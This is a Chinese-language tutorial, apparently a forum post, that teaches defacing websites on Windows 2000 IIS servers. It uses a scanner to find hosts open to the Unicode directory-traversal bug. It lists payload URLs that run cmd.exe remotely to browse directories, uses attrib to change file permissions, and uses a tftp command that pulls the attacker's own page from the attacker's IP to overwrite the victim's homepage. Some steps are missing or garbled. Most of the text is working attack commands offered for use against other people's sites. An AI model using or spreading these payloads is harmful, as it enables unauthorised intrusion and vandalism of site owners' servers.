需要的工具是：IE版本5.0以上的浏览器，RANGSCAN扫描器（可以到http://www.ycchat.net/tools1.htm）下载
好了，打开RANGSCAN 在扫描IP地址范围from里输入你要扫描的的起使IP在to后面输入结束IP
属性里面不要改 然后在“扫描内容”里面填 “/scripts/..%c0%2f../winnt/system32/cmd.exe”（这是扫描中文WIN200O的命令。另外：
扫描中文WIN2000的还有：/scripts/..%c1%1c../winnt/system32/cmd.exe
英语WIN2000 ：/scripts/..%c0%af../winnt/system32/cmd.exe
日语WIN200 ：/scripts/..%255c..%255cwinnt/system32/cmd.exe
/scripts/..%%35c..%%35cwinnt/system32/cmd.exe
在rangscan里的设置都填好以后就开始扫描，下面就以中文WIN2000为例子；
比如扫描的到的IP是 211.21.20.90
打开IE在网址栏输入 ： http://xxx.xxx.xxx.xxx/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\
就可以看到

的目录列表。有的IP也会碰到看不到文件的空目录。那么建议你找下一台机器
然后 在IE里输入 ： http://xxx.xxx.xxx.xxx/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+set
找到PATH_TRANSLATED=C:\InetPub\wwwroot
这就说明他的主页放在 C盘下 \InetPub\wwwroot 文件夹里
然后在输入 http://xxx.xxx.xxx.xxx/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
就可以看到他的C:\InetPub\wwwroot文件夹里的东西了
（这里一般会有 default.asp , default.htm, index.asp, index.htm.等等，这些是默认的主页文件，当然每台机器，每个 管理员设置的都会有所不同，具体请自己分析）
这个的主页就是 index.htm
我们就要改这个 了
首先要看看有没有权限 用 http://xxx.xxx.xxx.xxx/scripts/..%c0%2f../winnt/system32/attrib.exe?%20-r%20-h%20+C:\InetPub\wwwroot\index.htm （这里是指他的文件放置地点）
如果看到

呵呵，你可以改他的网页了。

那你就换个IP吧
好了，我们继续，

然后回车
这样你就简单的把他的主页黑掉了
下面说说如何上传htm文件（把能入侵的网站上传成自己作的主页）
首先现在一个TFTP软件并运行他，（运行前把其他的FTP服务器关掉）
然后输入http://xxx.xxx.xxx.xxx/scripts/..%c0%
（要入侵网站的IP）
2f../winnt/system32/cmd.exe?/c+tftp%20-i%2061.180.248.91%20GE
（你自己的IP）
T%20china.htm%20c:\inetpub\wwwroot\index.htm)
你自己电脑里主页的名字） （要更改网站的主页名字）
然后回车
这样你就把自己电脑里的china.htm放到入侵的网站里的c:\inetpub\wwwroot下了，并改名为index.htm了
好了，这样就把他的主页换掉了
